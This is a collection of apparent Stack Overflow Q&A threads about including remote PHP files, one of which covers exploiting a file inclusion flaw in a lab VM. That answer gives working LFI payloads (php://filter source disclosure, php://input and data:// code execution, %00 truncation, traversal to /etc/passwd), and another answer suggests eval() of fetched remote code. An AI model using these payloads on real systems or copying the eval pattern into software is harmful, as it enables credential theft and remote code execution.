I need to include to my php script external php code which is situated for example by link http://site.com/code.php How could I do it? I tryed all ways which I found in internet but no one works. All methods are good to include text but not php script.
You can only include the code if it is served as text: otherwise everyone would be able to see / use your code.
So the options you have:
Get the file trough ftp and include it with include or require
Get the file in plaintext, by serving .php files on "site.com" as text. This is ofcourse not a good idea, as everyone could see your source from there.
Put the file on the same server as the script that wants to include it.
If you need just the file to be 'run', you can curl it. You won't get the source (cannot use its functions etc) but any actions it performs (make file? add something to the database) will be run.
It is not possible, unless you can get the source code to it (aka. its published somewhere or it is on a file system you can access).
According to the PHP documentation (http://php.net/manual/en/features.remote-files.php) "As long as allow_url_fopen is enabled in php.ini, you can use HTTP and FTP URLs with most of the functions that take a filename as a parameter. In addition, URLs can be used with the include(), include_once(), require() and require_once() statements (since PHP 5.2.0, allow_url_include must be enabled for these)."
Related
I am trying to communicate between two servers through PHP. Lets say, there is one PHP file "a.php" on my localhost and another PHP file "b.php" on a remote server. I want to include b.php in a.php. I am trying to do this through include method by giving a full path of remore server "http://ip/b.php" but nothing happens.
Actually I want to run a part of script from a.php file then I want to communicate with b.php file and then return back to a.php file.
Please guide me how to do this. I know there are similar questions asked and I have tried to resolve this issue using those techniques but in vain.
Thank you
Nope, this setting is disabled/not allowed by default in most web servers (php.ini) so you can not use the include to include the files from a remote addresss for security reasons.
If you still want to allow inclusion of remote files, the directive allow_url_include must be set to On in php.ini
But again it is a bad practice, in a security-oriented point of view ; and, so, it is generally disabled (I've never seen it enabled, actually)
If you want to read the contents of a remote file though, you can use the file_get_contents function instead BUT this will be returned as pure HTML markup code, there won't be any server-side code.
including php file from another server with php
Another Solution is
Save your file as a text file removing the from it.
Access the file using file_get_contents
Example
http://ip/b.php - save this file as b.txt
<?php
$filedata = file_get_contents('http://ip/b.txt');
eval ("?>$filedata");
?>
As much as it is unsafe and bad practice, you can always turn off php for particular directory, using .htaccess (php_flag engine off).
Then your files will be served directly as a text files to whoever know url. That way you can include them via allow_url_include or as Mad Angle said get_file_contets.
But either way - its bad idea. So you can try it for science :)
Can I use include (or something similar) to get functions (or something else) from an online file?
Something like this:
include 'http://stackoverflow.com/questions/ask.php';
Simple Answer: No
Elaborating:
If you use http or https inside your file path, you are literally telling your code to include a file that is on the internet and to use the HTTP / HTTPS protocol in that process.
As you probably know, php code is executed on the server and is never displayed to users online, but rather the output of the php is displayed.
For that reason, you won't be able to gain access to your php functions while being a user from online (because that is how you will be perceived with the previous method).
What you should do is either use relative paths or absolute paths to include php scripts with functions on the same server. Here is some php documentation if you want to read a bit more on how to format the path: PHP DOC
I have this file that I want to run first before each PHP file. How can I achieve that? Now, I only use a classic php way.
run_me_first.php
and I want to tinclude it in my all of my PHP file. Besides putting it manually, is there a way not doing it manually?
Please try it with an .htaccess file:
php_value auto_prepend_file "/path/to/file/run_me_first.php"
If it's a free FTP, they might have some restrictions on what settings you can alter.
This could be achieved by using a require or include function to include the file in each of your php files. You haven't provided a great deal of information, so any response I can offer will be broad and may not pay to your particular needs.
I think You have an header file. If You dont't have then You create an header.php . Then include all Your files (.php , .js) which You want to include in all Your php files. Then You need to only include the header.php in the above of all Your php file.
Then this header.php will automatically include all Your required files.
This will reduce time and also will reduce the probability of error. This is the process which I used to follow in all of my project.
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.php which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).
This is the code of index.php, for reference:
<?php
include ("includes/header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") {
include("home.html");
} else { include ($page . '.php'); }
include ("includes/footer.php");
?>
The main goal is to list the contents of the setupreset PHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.
Now, the website uses PHP includes, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php but allow_url_include is off and cannot be changed, so this won't work (I tried this). However, allow_url_fopen is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of setupreset.php using this kind of exploit?
If allow_url_include is off, you can't execute remote code. But you can find other pages, for example a content management dashboard, to upload your code as "image", then find the actual path and include it.
And, there are still ways to exploit.
Let's look inside your code. You may notice that it automatically add an extension .php at the end of path. So you should remove php in GET param. But what if the file you want to include does not have PHP extension? Then use %00 to terminate string, such as
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
There's a special protocol in PHP, powerful and dangerous. It's php://.
You can check out the offcial manual for detailed information, and here I'll show you some cases to make a file inclusion vulnerability become source disclosure and even remote code execution vulnerabilities.
Before your test, I suggest you use Firefox with HackBar plugin. It's a powerful penetration testing suite.
Source disclosure
This feature doesn't need url inclusion allowed.
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. (Reference)
Then you can see the source secret.inc.php in the same directory via following request.
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
File content will be encoded in base64, so it does support binary file.
It's powerful to get sensitive information, such as database passwords or a encryption key! If privilege is not proper configurated, it can even jump out of cage and extract data from files in outter directories, like /etc/passwd!
Remote code execution
Actually you can't exploit this way, because allow_url_include is Off in this case.
But I must point it out because it's magical!
It's completly different from local include. It doesn't need to upload any file to a remote server or so. All you need is one single request.
php://input can access the raw HTTP request body, so what does include("php://input") do? Just visit http://localhost/include.php?page=php://input, with valid PHP code in request body, then you can execute any (allowed) function in remote server!
Don't forget the %00 to drop .php tail.
Besides, PHP supports data:// URL scheme. You can directly put code in GET param! The following test doesn't need any special tool, just a normal browser can execute an attack.
http://localhost/include.php?page=data:text/plaintext,<?php phpinfo();?>
Some Web Application Firewalls may detect suspected string in URL and block evil request, they won't leave the phpinfo alone. Is there a way to encrypt? Of course. data:// URL supports at least base64 encoding...
http://localhost/include.php?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
And you will get familiar phpinfo once again!
Note
The null byte trick (%00) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139
Use a directory traversal and end your input string with a %00 NUL meta character (as mentioned on wikipedia).
http://example.com/index.php?page=setuppreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
It is not. The php file is getting executed because you call include, if you called readfile, file_get_contents or similar you could see the contents of the php file.
Is it possible to call a PHP function found in a file on another website with a different domain?
For example, I know that to call a PHP function from another file in the same domain (say function aaa() found in aaa.php) I just have to simply do this (with a few simplifying assumptions):
include_once('aaa.php');
aaa();
I have tried doing something similar, such as:
include_once('http://othersite/aaa.php');
aaa();
I cannot get this to work (the page seems to load fine, with no error messages, but the function does not execute). I have tried require(), which gives me a blank screen. I have had no success with fopen either.
If it is possible to do this, how can I do it?
The include and require (and their _once variants) take a local filesystem path as their parameter. Domains have nothing to do with it.
Yes, you can also put an URL there (if you have the fopen wrappers enabled), but then PHP will just download the file and try to execute it. In other words, for this to work, if you entered http://othersite/aaa.php in your browser, it should show the PHP source, not the results of processing it.
When passing an URL to include \ require, PHP cannot do anything more than your browser. It's at the mercy of the webserver at othersite. If it doesn't return PHP code, there is no way that PHP can get to it.
What you are currently doing is getting the remote server to execute the PHP file and then you're reading the parsed contents -- the same as a browser would. So you get (presumably) HTML, not PHP code.
If the remote code does not need to be kept private for any reason (e.g. security) you can get the remote server to serve you the PHP source code. The easiest way to do that is to rename the file as aaa.txt, so it will not be passed to the PHP interpreter.
You can only do this if the other server is set to serve the PHP files as source -- i.e., without executing them.